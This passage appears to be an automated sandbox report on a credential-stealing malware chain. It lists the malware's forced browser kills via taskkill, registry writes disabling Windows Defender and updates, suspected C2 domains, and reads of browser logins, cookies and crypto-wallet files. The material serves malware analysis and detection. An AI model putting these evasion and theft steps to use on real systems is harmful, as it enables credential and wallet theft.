Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Code function: 10_2_0025C6A2 rdtsc 10_2_0025C6A2
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Code function: 10_2_000CB7EA LdrInitializeThunk, 10_2_000CB7EA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_0045652B mov eax, dword ptr fs:[00000030h] 17_2_0045652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_0045A302 mov eax, dword ptr fs:[00000030h] 17_2_0045A302
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: 76bf5a4dba.exe PID: 4304, type: MEMORYSTR
Source: file.exe, 00000000.00000003.1283257547.0000000004C40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.1283257547.0000000004C40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.1283257547.0000000004C40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.1283257547.0000000004C40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.1283257547.0000000004C40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.1283257547.0000000004C40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.1283257547.0000000004C40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.1283257547.0000000004C40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe "C:\Users\user~1\AppData\Local\Temp\1002596001\100bc97ff1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe "C:\Users\user~1\AppData\Local\Temp\1002597001\76bf5a4dba.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe "C:\Users\user~1\AppData\Local\Temp\1002598001\ee3f3c2bda.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002599001\num.exe "C:\Users\user~1\AppData\Local\Temp\1002599001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002600001\test.exe "C:\Users\user~1\AppData\Local\Temp\1002600001\test.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: ee3f3c2bda.exe, 00000016.00000000.2350655418.0000000000BE2000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe, M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe, 0000000A.00000002.1668517186.00000000002BD000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: |vProgram Manager
Source: firefox.exe, 00000024.00000002.2539895423.000000BA7DC3B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: skotes.exe, skotes.exe, 00000011.00000002.2514013755.0000000000618000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Ns6lProgram Manager
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe, 0000000B.00000002.1593731154.0000000000488000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 0000000C.00000002.1621988683.0000000000618000.00000040.00000001.01000000.0000000C.sdmp, skotes.exe, 0000000D.00000002.1625119302.0000000000618000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: oNs6lProgram Manager
Source: 100bc97ff1.exe, 00000013.00000002.2520595887.0000000000623000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_0043D3E2 cpuid 17_2_0043D3E2
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002599001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002599001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002600001\test.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002600001\test.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_0043CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 17_2_0043CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_004265E0 LookupAccountNameA, 17_2_004265E0
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Registry value created: TamperProtection 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
Source: 100bc97ff1.exe, 00000013.00000003.2357604902.0000000000D86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r\MsMpeng.exe
Source: 100bc97ff1.exe, 00000013.00000003.2329931380.0000000000D86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 11.2.4XW8W5G3AUTSGA2M5UZH7L9.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.skotes.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.skotes.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.skotes.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000003.1584824472.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1581637414.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.2063993916.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2512114428.0000000000421000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1625041003.0000000000421000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1593645355.0000000000291000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1621915731.0000000000421000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1553486774.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ee3f3c2bda.exe PID: 4100, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 6604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 100bc97ff1.exe PID: 6228, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 100bc97ff1.exe PID: 5796, type: MEMORYSTR
Source: Yara match File source: 39.0.num.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.num.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.76bf5a4dba.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.76bf5a4dba.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000002.2527848797.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2427332199.0000000000E61000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2307921520.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2427703297.0000000000E7E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2435358358.000000000168E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2351036059.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.2407308051.0000000000E7E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2348423588.0000000000321000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.2407233161.0000000000E61000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.2454084311.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2512290004.0000000000321000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 76bf5a4dba.exe PID: 4304, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.1313659387.0000000001137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectrumTI8+hmP9D
Source: file.exe, 00000000.00000003.1313659387.0000000001137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.1313659387.0000000001137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.jsonh9*9
Source: file.exe, 00000000.00000003.1313659387.0000000001137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 100bc97ff1.exe, 00000015.00000003.2400684236.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum\
Source: file.exe, 00000000.00000003.1358249522.0000000001128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.1313659387.0000000001137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereumyjhsdl
Source: file.exe, 00000000.00000003.1358249522.0000000001128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.1358249522.0000000001128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
